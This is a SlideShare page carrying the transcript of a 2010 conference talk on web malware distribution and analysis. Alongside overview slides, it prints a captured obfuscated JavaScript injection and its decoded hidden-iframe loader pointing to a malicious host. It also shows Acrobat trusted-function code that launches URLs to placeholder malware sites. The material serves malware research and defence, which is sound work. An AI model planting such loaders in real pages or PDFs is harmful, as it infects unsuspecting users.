Your SlideShare is downloading. ×
0
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Scaling Web 2.0 Malware Infection

2,428

Published on

Given at TRISC 2010, Grapevine, Texas. …

Given at TRISC 2010, Grapevine, Texas.
http://www.trisc.org/speakers/aditya_sood/#p

The talk sheds light on the new trends of web based malware. Technology and Insecurity goes hand in hand. With the advent of new attacks and techniques the distribution of malware through web has been increased tremendously. Browser based exploits mainly Internet Explorer have given a birth to new world of malware infection. The attackers spread malware elegantly by exploiting the vulnerabilities and drive by downloads. The infection strategies opted by attackers like malware distribution through IFRAME injections and Search Engine Optimization. In order to understand the intrinsic behavior of these web based malware a typical analysis is required to understand the logic concept working behind these web based malwares. It is necessary to dissect these malwares from bottom to top in order to control the devastating behavior. The talk will cover structured methodologies and demonstrate the static, dynamic and behavioral analysis of web malware including PCAP analytics. Demonstrations will prove the fact and necessity of web malware analysis.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total Views
2,428
On Slideshare
0
From Embeds
0
Number of Embeds
4
Actions
Shares
0
Downloads
69
Comments
0
Likes
1
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  1. Scaling Web 2.0 Malware Infection ______________________________________ Aditya K Sood, Sr. Security Practitioner Armorize , Santa Clara US
  2. Disclaimer All contents of this presentation represent my own beliefs and views and do not, unless explicitly stated otherwise, represent the beliefs of my current, or any of my previous in that effect, employers.
  3. About Me - $whoami • Senior Security Practitioner , Armorize http://www.armorize.com • Founder , SECNICHE Security. http://www.secniche.org • Worked previously for COSEINC as Senior Security Researcher and Security Consultant for KPMG • Written content Author for HITB E-Zine, Hakin9 ,ELSEVIER, USENIX Journals. • Like to do Bug Hunting and Malware dissection. • Released Advisories to Forefront Companies. • Active Speaker at Security Conferences including RSA etc.
  4.  Agenda  Understanding The Malware Anatomy  The Vertical Risk – Malware Impact on Business  Top 10+ Web Malware Infection Strategies  2X Generation - Century Malware Trickeries  Case Study – Infection through PDF Trusted Functions  Demonstration
  5.  Pattern Understanding The Malware Anatomy The Dependent Peripherals
  6.  Malware Mess – Global Trifecta
  7.  Malware Infection Rate
  8.  Malware Retrospective and Classification Top 5 Malware Categories Top 5 Virus Families Trojan (31.2 %) Stuh (4.4 %) Downloader (25.6 %) Fraudload (3.9 %) Backdoor (13.8 %) Monder (3.6 %) Spyware (13.2 %) Autorun (2.7 %) Adware (4.9%) Buzus (2.7 %) Interdependency
  9.  Malware - The Impact on Real World
  10.  Malware Trends – The Attack Base  Financial abuse and mass identity theft  The mass destructor – Botnet infection and zombie hosts  Exploiting the link dependency – Pay Per click hijacking  Traffic manipulation – Open redirect vulnerabilities at large scale  Spywares , crypto virology , ransom ware etc  Distributed Denial of Service – The service death game , extortion  Industry change semantics – Malware activation change line  Infection through browsers and portable gadgets – the biggest step  Exploiting anti virus loopholes
  11.  Malware Contributing Issues – Rising Steps  Publicly available malware source code  Malware distribution framework such MPACK , NeoSploit etc.  Unpatched vulnerabilities and loosely coupled patches  Demand of underground services and self exposure  Global surveillance mode and information stealing in the wild  Software discrepancies and inherited design flaws such as Browsers.  Exploitation at web level is easy. It opens a door to System Level Fallacies.  Inappropriate security solutions deployed and irrelevant security paradigm  Botnet Infection – The easy way to launch diversified attack  Web sharing and centralized work functionality.
  12.  Pattern Understanding The Vertical Risk Web Delivered Malware Impact on Business Underground Market and Malware Flow Model
  13.  Underground Malware Market Business - Statistics © GDATA
  14.  Practical Malware Flow Model Malware Writers Role Flow of Malware Websites © Reihe Informatik. TR-2007-011
  15.  Malware - The Impact on Real World
  16.  Pattern Malware – Sources of Infection Web 2.0 Top 10 + Strategies of Distributing Malware through Web
  17. Long Live Drive By Download – Base Web Malware Tactic
  18. (SEO) Poisoning – Driven with Malware
  19. Messengers – Infection at Instant State
  20.  Networking Websites – TWITTER Malware Infection  Exploiting the trust relationship on Social Networking Websites  Spreading malware content through Tweets , Scrapping etc  Chain Reaction – Dwells very fast in Website Networks (URL Shortening Trick)
  21.  Social Networking – FACEBOOK Malware Applications  Manipulating the Open API Calls  User centric control  Exploiting the design fallacies
  22.  Social Networking – FACEBOOK MAIL Infection Step 1 Step 2 Step 3
  23.  Online Media Content – You Tube, Google Videos etc !!
  24.  Exploiting the Web of Trust – Human Touch
  25.  Spywares , Ransom Wares and other Variants etc.
  26.  Insidious Spamming – Email , Blogs , Redirectors etc
  27. Botnets – Malware Infection at Large Scale
  28.  Direct Malware Hosting – Infected Web Domains
  29.  System Stringency – Exploiting the Exceptions
  30. Malware Kits – Automated Infection
  31.  Case Study – Safety Labs Malware Infection Malware Infecting the Security Service Provider Websites. ____________________________________________________________ It is unfortunate that even the Security Solution Provider is also touched by the latest Internet IFRAME threats or rather say infections Thousands of websites on internet have been compromised with malicious Iframes which load exploit code designed to silently install trojans onto susceptible victim computers.
  32.  Case Study – Safety Labs Malware Infection
  33.  Case Study – Safety Labs Malware Infection Script Source is OBFUSCATED JAVASCRIPT http://www.safety- lab.com/audits/categorylist.pl?lang=en <SCRIPT LANGUAGE=JAVASCRIPT> FUNCTION MDBAN(X){VAR L=X.LENGTH,B=1024,I,J,R,P=0,S=0,W=0,T=ARRAY(63,9,52,47,48,11,7,35, 59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34, 0,58,40,31,60 ,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);FOR(J=MATH.CEIL(L/B);J>0;J-- ){R='';FOR(I=MATH.MIN(L,B);I>0;I--,L--){{W |=(T[X.CHARCODEAT(P++)-48])<<S;IF(S){R+=STRING.FROMCHARCODE(221^W&255);W>>=8;S- =2}ELSE{S=6}}}EVAL(R);}}MDBAN('ZT8M VN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9 QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5ML E0DMXICGRAD F@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5 Y7@HD')</SCRIPT><!-- 213.219.250.100 -->
  34.  Case Study – Safety Labs Malware Infection Complexity factor is always high in decoding DEOBFUSCATED JAVASCRIPT the malicious JavaScript. (1) DECODED JAVASCRIPT EVALS() WINDOW.STATUS = 'DONE'; DOCUMENT.WRITE('<IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?' + MATH.ROUND(MATH.RANDOM() * 14490) + '5B8F' + '" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE"></IFRAME>') (2) DECODED JAVASCRIPT WRITES RESULT <IFRAME NAME=5B8F SRC="HTTP://3PIGS.INFO/T/?58965B8F" WIDTH=322 HEIGHT=45 STYLE="DISPLAY:NONE"> </IFRAME> HTTP://3PIGS.INFO/T/?58965B8F “ was injected as source for malicious file .
  35.  2X Generation Malware Trickeries  System File Patching and Code Injection  Code Interdependency – Malware Adjacency - Code Resuscitation.  Code Randomization, Obfuscation and Morphing  Rootkits and System Cloaking  Exploiting Active X and JavaScript Heaps – Direct Control
  36.  Escaping What ! Private & Confidential Property of Armorize
  37.  Malware Analysis Methodology (MAM) - Overview End Point Communication  Connection state check  Server identity checks through communication medium.  Error generation like Checksum Integrity.  Encrypted data in packets.  Protocol Switching. Session Stream Analysis – Deep Inspection Analyzing TCP stream session  Extracting an executable from the raw data Behavioral Analysis – Scrutinizing system fallacies  Active debugging  Black Box Testing approach Static Analysis – Reversing the facets of malware Its all about analyzing the code of Malware
  38.  Case Study – Malware Infection PDF Trusted Functions (Understanding the Facets of Malware)
  39.  Some PDF Truths  Hyperlink execution notification as alerts  Data is not allowed to be stored in the forms http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf  Number of vulnerable functions have been removed i.e. from registered state  Support for Adobe reader 7.xx has been removed http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html  Other alerts have been structured as security checks in standalone PDF’s  ACRO JS does not support DOM as normal JavaScript does. Adobe has inbuilt functionality to provide a code wrappers which calls restricted functions in specific environments. For example:- In general, it is not possible to generate another PDF from the standalone PDF when it is opened
  40.  Understanding Malware Infection - PDF  Exploiting the browser – Downloading files through Windows Media Player  Exploiting the Global Access of JavaScript folder in PDF Hidden gift.js file containing malicious code is placed here
  41.  Understanding Malware Infection - PDF  Calling Codes through Trusted Functions  Trusted function body calls the app.beginPriv (begin privileges) and app.endPriv(end privileges) to enclose any type of function and code to be trusted.  The trusted functions method can be called successfully on the initialization of the application and it is possible to call certain number of restricted functions through it. myTrustedFunction = app.trustedFunction( function() { <function body> } ); New Scareware Message – Opening a new PDF trustedDoc = app.trustedFunction( function (width,height) { app.beginPriv(); var trustDoc = app.newDoc(width,height); trustDoc.addWatermarkFromText("X JERKED X"); app.endPriv(); return trustDoc; }) trustedDoc(300,300);
  42.  Understanding Malware Infection - PDF  Calling Codes through Trusted Propagator Functions myPropagatorFunction = app.trustPropagatorFunction( function() { <function body> } URL Opening - Drive by Download Infections trustedDoc = app.trustedFunction ( function (cURL, bNewFrame) { app.beginPriv(); var trustedDoc = app.launchURL(cURL, bNewFrame); app.endPriv(); return trustedDoc; } ) trustedDoc("http://www.malware1.com",true); trustedDoc("http://www.malware2.com",true); trustedDoc("http://www.malware3.com",true); trustedDoc("http://www.malware4.com",true); trustedDoc("http://www.malware5.com",true);
  43.  Understanding Malware Infection - PDF
  44.  Demonstration
  45.  Questions and Queries
  46.  Thanks and Regards Special thanks to Armorize for pushing me to do more research. http://www.armorize.com __________________________________________________________________________________ Portal and Blog SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com (Screenshots shared from various resources)

×